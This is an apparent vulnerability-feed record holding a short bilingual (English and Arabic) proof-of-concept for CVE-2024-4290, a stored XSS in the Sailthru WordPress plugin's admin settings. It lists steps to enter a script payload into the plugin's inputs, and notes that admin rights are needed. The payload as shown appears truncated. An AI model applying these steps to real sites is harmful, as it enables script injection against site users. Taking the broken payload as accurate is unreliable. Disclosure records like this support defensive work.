{"uuid": "14b48853-c70a-4ab2-90ef-e6f05cf68b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4290", "type": "published-proof-of-concept", "source": "https://t.me/openSource3/134", "content": "CVE ID : CVE-2024-4290\nSystem : wordpress\nType : Stored XSS\n\nExploit :\n1. Go to https://example.com/wp-admin/options-general.php?page=sailthru&action=options\n\n2. Enter the payload \">alert(2) for any of the inputs\n\n3. Save and see the XSS\n\u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 :\n1. \u0627\u0630\u0647\u0628 \u0627\u0644\u0649 \u0647\u0630\u0627 \u0627\u0644\u0645\u0633\u0627\u0631 \u0641\u064a \u0627\u0644\u0645\u0648\u0642\u0639 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641  https://example.com/wp-admin/options-general.php?page=sailthru&action=options\n\n2. \u0627\u062f\u062e\u0644 \u0627\u0644\u0628\u0627\u0644\u0648\u062f \n \">alert(2) \n\n3. \u0627\u062d\u0641\u0638 \u0648\u0634\u0627\u0647\u062f xss\n\n \u0645\u0644\u0627\u062d\u0638\u0629 : \u064a\u062c\u0628 \u0623\u0646 \u062a\u0643\u0648\u0646 \u064a\u0648\u0632\u0631 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0639\u0627\u0644\u064a\u0629 \u0639\u0644\u0649 wordpress \u062d\u062a\u0649 \u062a\u0646\u0641\u0630 \u0627\u0644\u0647\u062c\u0645\u0629 \u0639\u0644\u0649 \u0627\u0644\u0645\u0648\u0642\u0639\n\nNote : you must  be a high prvilage user such as admin to perform this attack", "creation_timestamp": "2024-05-25T18:20:50.000000Z"}